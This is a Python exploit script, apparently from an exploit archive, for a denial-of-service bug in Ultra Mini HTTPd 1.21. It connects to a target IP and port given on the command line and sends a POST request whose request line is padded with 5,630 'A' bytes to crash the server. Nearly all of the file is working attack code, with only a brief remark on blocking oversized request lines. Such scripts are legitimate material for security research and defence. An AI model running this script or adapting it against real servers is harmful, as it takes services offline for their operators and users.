# Exploit Title: Ultra Mini HTTPd 1.21 - POST - Denial of Service (DoS)
# Discovery by: Fagner Lima - Aka r3ng4f
# Discovery Date: 2024-1016
# Vendor Homepage: https://acme.com/
# Software Link: https://acme.com/
# Notification vendor: Yes reported
# Tested Version: Ultra Mini HTTPd 1.21
# Tested on: Windows XP Professional - Service Pack 2 and 3 - English
# Vulnerability Type: Denial of Service (DoS)
import socket
import sys
import os
# Clear the console depending on the system
def clear_console():
    """Clear the terminal with the platform's own command.

    Uses ``cls`` when ``os.name`` is ``'nt'`` (Windows) and ``clear`` on every
    other platform. The command string is a fixed literal, so nothing
    user-supplied reaches the shell.
    """
    command = 'cls' if os.name == 'nt' else 'clear'
    os.system(command)
# Intro text
def intro():
    """Print the eight-line banner naming the target software and the author."""
    banner_lines = (
        "***************************************************",
        "* Ultra Mini HTTPd 1.21 - Denial of Service *",
        "* *",
        "* Coded by Fagner Lima - Aka r3ng4f *",
        "* *",
        "* e-mail: fagner.alex@gmail.com *",
        "* *",
        "***************************************************",
    )
    # One print per banner line keeps the output identical to eight
    # separate print() calls.
    for line in banner_lines:
        print(line)
# Main function to handle IP and port arguments
def main():
    """Read the target address from the command line.

    Expects exactly two arguments after the script name: ``<ip> <port>``.
    On any other argument count it prints a usage line and exits with
    status -1.

    Returns:
        A ``(ip, port)`` tuple; ``ip`` is the raw string and ``port`` has been
        converted with ``int()``.

    Raises:
        ValueError: if the port argument is not an integer literal. The port
            range is not checked here.
    """
    arguments = sys.argv[1:]
    if len(arguments) != 2:
        print("\nUsage: {} <ip> <port>".format(sys.argv[0]))
        sys.exit(-1)
    host, port_text = arguments
    return host, int(port_text)
# Function to exploit the vulnerability
def exploit(ip, port):
    """Send one oversized POST request line to ``ip:port`` over TCP.

    The request is ``POST / <5630 x 'A'> HTTP/1.1`` followed by a ``Host``
    header and a blank line; the filler is built as 5438 + 192 bytes. The file
    header reports that Ultra Mini HTTPd 1.21 on Windows XP SP2/SP3 stops
    serving after receiving it. The root cause is not shown in this file.

    For defenders: the traffic is a single request whose request line is
    several kilobytes of one repeated byte. A reverse proxy or IDS rule that
    caps request-line length well below this size keeps it from reaching the
    daemon.

    Any exception raised while connecting, building, or sending the request
    is caught and reported with the "Failed to connect" message, so that
    message also covers send and encoding errors. The response is never read,
    so "sent successfully" says nothing about the server's state.
    """
    print("[+] Exploiting...")
    tail = "\x41" * 192
    filler = 'A' * 5438 + tail
    try:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
            sock.connect((ip, port))
            # Same bytes on the wire as the original f-string request.
            request = "".join(
                ("POST / ", filler, " HTTP/1.1\r\nHost:", f"{ip}", "\r\n\r\n")
            )
            wire_bytes = request.encode()
            sock.send(wire_bytes)
            print("[+] Exploit sent successfully!")
    except Exception as err:
        print(f"[-] Failed to connect: {err}")
# Run the exploit
if __name__ == "__main__":
    # Script entry: clear the screen, show the banner, then parse the
    # command-line target and send the single request to it.
    clear_console()
    intro()
    exploit(*main())